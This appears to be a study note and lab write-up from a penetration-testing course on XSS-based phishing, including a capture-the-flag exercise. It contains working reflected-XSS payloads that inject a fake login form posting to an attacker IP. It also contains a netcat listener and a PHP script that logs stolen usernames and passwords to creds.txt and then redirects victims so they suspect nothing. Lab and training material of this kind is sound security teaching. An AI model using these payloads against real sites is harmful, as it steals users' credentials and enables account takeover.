# Login Form Injection

- Once we identify a working XSS payload, we can proceed to the phishing attack
- To perform an XSS phishing attack, we must inject HTML code that displays a login form on the targeted page
- This form should send the login information to a server we are listening on, so that once a user attempts to log in, we get their credentials
- HTML code for a basic login form that sends the submitted fields to the IP we are listening on

```html
<h3>Please login to continue</h3>
<form action=http://OUR_IP>
    <input type="username" name="username" placeholder="Username">
    <input type="password" name="password" placeholder="Password">
    <input type="submit" name="submit" value="Login">
</form>
```

- Drop the HTML login form into the JS function `document.write()` within a one-liner payload to inject into the vulnerable web page

```javascript
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');
```

- In this case, we are exploiting a `Reflected XSS` vulnerability, so we can copy the URL with our XSS payload in its parameters, as we did in the `Reflected XSS` section, and the page should look as follows when we visit the malicious URL

![[images/Pasted image 20251213201600.png]]

## Cleanup

- We can see that the URL field is still displayed, which undermines our line "`Please login to continue`"
- So, to encourage the victim to use the login form, we should remove the URL field, such that they may think that they have to log in to be able to use the page.
- To do so, we can use the JavaScript function `document.getElementById().remove()`
- To find the `id` of the HTML element we want to remove, we can open the `Page Inspector Picker` by pressing [`CTRL+SHIFT+C`] and then clicking on the element we need
- As we see in both the source code and the hover text, the `url` form has the id `urlform`

![[images/Pasted image 20251213201700.png]]

- We can now use this id with the `remove()` function to remove the URL form

```javascript
document.getElementById('urlform').remove();
```

- Now add this cleanup section to our above payload

```javascript
document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();
```

![[images/Pasted image 20251213201845.png]]

- Clean up the stray `>` being shown by appending an HTML opening comment after the XSS payload

```html
<!--
```

## Setting up a listener

- Finally, we need to set up a listener to capture the login credentials when the victim attempts to log in on our injected login form

### Netcat Listener

- Simple `netcat` listener

```bash
sudo nc -lvnp 80
connect to [10.10.XX.XX] from (UNKNOWN) [10.10.XX.XX] XXXXX
GET /?username=test&password=test&submit=Login HTTP/1.1
Host: 10.10.XX.XX
<SNIP>
```

- As we can see, the credentials are captured in the HTTP request URL (`/?username=test&password=test`). If any victim attempts to log in with the form, we will get their credentials
- However, as we are only listening with a `netcat` listener, it will not handle the HTTP request correctly, and the victim would get an `Unable to connect` error, which may raise some suspicions

### PHP Listener

- Instead, we can use a basic PHP script that logs the credentials from the HTTP request and then returns the victim to the original page without any injections.
- In this case, the victim may think that they successfully logged in and will use the Image Viewer as intended
- Create `index.php` with the below and place it in `/tmp/tmpserver`

```php
<?php
if (isset($_GET['username']) && isset($_GET['password'])) {
    $file = fopen("creds.txt", "a+");
    fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
    header("Location: http://SERVER_IP/phishing/index.php");
    fclose($file);
    exit();
}
?>
```

- Start the PHP listener; the stolen creds are written to `creds.txt`

```bash
mkdir /tmp/tmpserver
cd /tmp/tmpserver
vi index.php # at this step we wrote our index.php file
sudo php -S 0.0.0.0:80
PHP 7.4.15 Development Server (http://0.0.0.0:80) started
cat creds.txt
Username: test | Password: test
```

# Exercise

- Find a working XSS payload at `/phishing` and use it to prepare a malicious login form
- Then steal creds to access `/phishing/login/php` for the flag
- Ping test

![[images/Pasted image 20251213202748.png]]

- Fast nmap scan

![[images/Pasted image 20251213202802.png]]

- Visit page

![[images/Pasted image 20251213202827.png]]

- Test basic alert payload
- We are getting a dead image and something written to the page source

```html
<script>alert(window.origin)</script>
```

![[images/Pasted image 20251213203014.png]]
![[images/Pasted image 20251213203023.png]]

- Run `xsstrike`
- Workable payloads indicate that a script payload prepended with `'>` will work here
- This is the commonality across workable payloads from `xsstrike`

```bash
python xsstrike.py -u "http://10.129.229.208/phishing/index.php?url=%3Cscript%3Ealert%28window.origin%29%3C%2Fscript%3E"
```

![[images/Pasted image 20251213203515.png]]

- Chain the above payload with a basic alert script
- Looks like a working XSS payload

```html
'><DEtAILS%0aoNPoInTEreNtEr+=+[8].find(confirm)>;<script>alert(window.origin)</script>
```

![[images/Pasted image 20251213204218.png]]
![[images/Pasted image 20251213204224.png]]

- Let's build a payload with a login form

```html
'><DEtAILS%0aoNPoInTEreNtEr+=+[8].find(confirm)>;<script>alert(document.write('<h3>Please login to continue</h3><form action=http://10.10.14.200><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>'))</script>
```

- Produces an ugly page but works

![[images/Pasted image 20251213204631.png]]

- Try cleaning up and removing the alert
- Page looks super clean; no stray HTML code being presented

```html
'><script>document.write('<h3>Please login to continue</h3><form action=http://10.10.14.200><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();</script> <!--
```

![[images/Pasted image 20251213205645.png]]

- Try sending with the `netcat` listener
- URL sent

![[images/Pasted image 20251213210040.png]]

- Nothing on the listener

![[images/Pasted image 20251213210050.png]]

- Set up a PHP listener
- Create the `/tmp/tmpserver` directory and an `index.php` file within it using the PHP code below

![[images/Pasted image 20251213210123.png]]

```php
<?php
if (isset($_GET['username']) && isset($_GET['password'])) {
    $file = fopen("creds.txt", "a+");
    fputs($file, "Username: {$_GET['username']} | Password: {$_GET['password']}\n");
    header("Location: http://10.129.229.208/phishing/index.php");
    fclose($file);
    exit();
}
?>
```

- URL sent again and we have more info with a PHP listener

![[images/Pasted image 20251213210247.png]]
![[images/Pasted image 20251213210257.png]]

- Cat `creds.txt`

![[images/Pasted image 20251213210323.png]]

- Attempt to log in for the flag > got em!

![[images/Pasted image 20251213210355.png]]